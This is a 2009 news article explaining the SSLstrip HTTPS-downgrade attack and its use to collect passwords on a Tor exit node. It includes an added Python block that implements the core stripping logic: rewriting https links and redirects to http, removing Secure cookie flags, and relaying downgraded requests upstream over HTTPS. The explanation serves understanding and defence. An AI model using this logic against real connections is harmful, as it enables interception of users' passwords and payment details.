Hacker creates SSLstrip package

February 20, 2009 // 1:49 p.m.

Tags: #black-hat #encryption #hack #hacker #moxie-marlinspike #rsa #secure-sockets-layer #ssl #sslstrip #tor

If you think that your connection to websites is secure, new research might give you cause to think otherwise.

According to an article on The Register, hacker Moxie Marlinspike – an alias, obviously – has used this week's Black Hat security conference to unveil a new attack against Secure Sockets Layer (SSL) connections to websites.

Dubbed “SSLstrip,” the attack is a novel form of man-in-the-middle attack that can be carried out wherever the attacker can sit in the traffic path: on publicly-accessible WiFi networks, at the exit of onion-routing networks like Tor, or on local area networks that share a single connection point to the Internet. Placed between a client and a server, the tool leaves the user believing that a secure connection to a website has been opened – while usernames, passwords, and credit card details are actually transmitted in plain text.

According to Marlinspike's presentation, the attack works because most browsing sessions start out unencrypted. SSL costs the server extra work, so most websites serve ordinary pages over plain HTTP and only switch to SSL when private information – a login, a payment – is about to be transmitted in either direction. Users rarely type “https://” themselves; they reach the encrypted page by following a link or a redirect from an unencrypted one, and it is that link or redirect the attack targets.

SSLstrip watches the unencrypted traffic and rewrites every link pointing at HTTPS – port 443 – into one pointing at HTTP – port 80 – so the browser submits its form data in plain text, without encryption. Meanwhile the tool keeps an ordinary, fully encrypted HTTPS connection open to the real website and relays the data on, so the website sees nothing unusual; the browser, which only ever asked for an HTTP page, has no certificate to complain about. No error message is ever generated on either side.
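As an added illustration of the rewriting step just described (this is example code written for this page, not code from the article or from Marlinspike's tool), the snippet below takes a constructed response as the real site would send it over HTTPS, downgrades every “https://” link and redirect target to “http://”, and remembers which addresses it downgraded so that a later plain-HTTP request for one of them is forwarded upstream over HTTPS. The Secure-flag handling on Set-Cookie is my addition rather than something the article describes: a browser will not send a cookie marked Secure over plain HTTP, so a downgrade proxy has to strip that flag too. The hostnames and cookie values are made up.

```python
import re

# Constructed sample: what the real site sends the proxy over HTTPS.
# Not a real capture; built here only to exercise the rewrite logic.
SAMPLE_HEADERS = {
    "Location": "https://www.example.com/login",
    "Set-Cookie": "session=abc123; Path=/; Secure; HttpOnly",
    "Content-Type": "text/html",
}
SAMPLE_BODY = (
    '<html><body>'
    '<a href="https://www.example.com/account">My account</a>'
    '<form action="https://www.example.com/login" method="post">'
    '<input name="user"><input name="pass" type="password"></form>'
    '<img src="http://static.example.com/logo.png">'
    '</body></html>'
)

# Matches an https:// URL: group 1 is host[:port], group 2 the path (if any).
HTTPS_URL = re.compile(
    r"https://([A-Za-z0-9.-]+(?::\d+)?)(/[^\s\"'<>]*)?", re.IGNORECASE)
# Matches the Secure attribute of a Set-Cookie header, whole-word only.
SECURE_FLAG = re.compile(r";\s*Secure(?=;|$)", re.IGNORECASE)


class StripState:
    """Remembers which (host, path) pairs were downgraded, so the proxy knows
    which plain-HTTP requests from the victim must go upstream over HTTPS."""

    def __init__(self):
        self.downgraded = set()

    def remember(self, host, path):
        self.downgraded.add((host.lower(), path or "/"))

    def upstream_scheme(self, host, path):
        """Scheme the proxy uses to forward a request it received as
        http://host/path: https if that address was one it downgraded."""
        key = (host.lower(), path or "/")
        return "https" if key in self.downgraded else "http"


def strip_https_links(text, state):
    """Rewrite every https:// URL in text to http:// and record it."""
    def downgrade(match):
        host, path = match.group(1), match.group(2)
        state.remember(host, path)
        return "http://" + host + (path or "")
    return HTTPS_URL.sub(downgrade, text)


def strip_response(headers, body, state):
    """Downgrade a server response before it is relayed to the victim.

    Location headers (redirects to the login page) and links in the body
    are rewritten; the Secure flag is removed from cookies so the browser
    will keep sending them over the now-unencrypted connection."""
    out = {}
    for name, value in headers.items():
        if name.lower() == "location":
            value = strip_https_links(value, state)
        elif name.lower() == "set-cookie":
            value = SECURE_FLAG.sub("", value)
        out[name] = value
    return out, strip_https_links(body, state)


if __name__ == "__main__":
    state = StripState()
    headers, body = strip_response(SAMPLE_HEADERS, SAMPLE_BODY, state)
    print(headers["Location"])
    print(headers["Set-Cookie"])
    print(body)
    # The victim's POST to http://www.example.com/login is relayed over https:
    print(state.upstream_scheme("www.example.com", "/login"))
```

The victim's browser now loads http://www.example.com/login and posts the password in clear text; the proxy looks the address up, sees it was downgraded, and forwards the request over a normal HTTPS connection to the real server, which is none the wiser. Note that the image link that was already plain HTTP is left alone and is not forwarded over HTTPS.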

Where the tool gets clever is in an optional mode that serves the proxy's own pages over SSL, using a certificate that is genuinely valid – for a domain the attacker controls rather than for the real site. The connection between the web browser and the SSLstrip proxy is then secured with valid credentials, which means the browser's built-in certificate warnings – its usual defence against this sort of man-in-the-middle attack – are never triggered, and the user continues to see that oh-so-reassuring padlock symbol and an “https://” address.

The attack – which has been tested against both Firefox and Safari – isn't a mere proof of concept, either: Marlinspike has successfully run the package on a Tor exit node, gathering 254 passwords for supposedly-secure sites including Gmail, TicketMaster, and PayPal over the course of a single day.

So far, there is no real solution to the problem of SSL man-in-the-middle attacks – aside from, as Marlinspike himself states, to “encrypt everything” – something that would require webhosts to invest in significantly more powerful hardware. Even that only helps if the browser never makes its first request over plain HTTP, since that initial unencrypted exchange is where SSLstrip gets its foothold.

Does the knowledge that a simple tool for sniffing your SSL-protected details exists give you cause for alarm, or is the likelihood of someone being in a position to run a man-in-the-middle attack so low that the SSLstrip package is nothing more than an interesting toy? Share your thoughts over in the forums.
